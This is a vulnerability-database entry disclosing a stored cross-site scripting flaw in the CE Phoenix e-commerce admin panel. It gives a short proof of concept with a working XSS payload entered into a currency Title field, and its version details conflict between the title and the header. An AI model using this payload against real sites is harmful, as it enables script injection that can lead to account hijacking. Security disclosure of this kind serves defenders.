Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtTmrswrr1337DAY-ID-39608
HistoryMay 13, 2024 - 12:00 a.m.

CE Phoenix Version 1.0.8.20 - Stored XSS Vulnerability

2024-05-1300:00:00
tmrswrr
0day.today
16
stored xss
ce phoenix
admin panel
webapps
vulnerability

7.4 High

AI Score

Confidence

Low

JSON
# Exploit Title: CE Phoenix Version 1.0.8.20  - Stored XSS
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://phoenixcart.org/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix

## POC:

1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
4-You will be see alert button

7.4 High

AI Score

Confidence

Low

JSON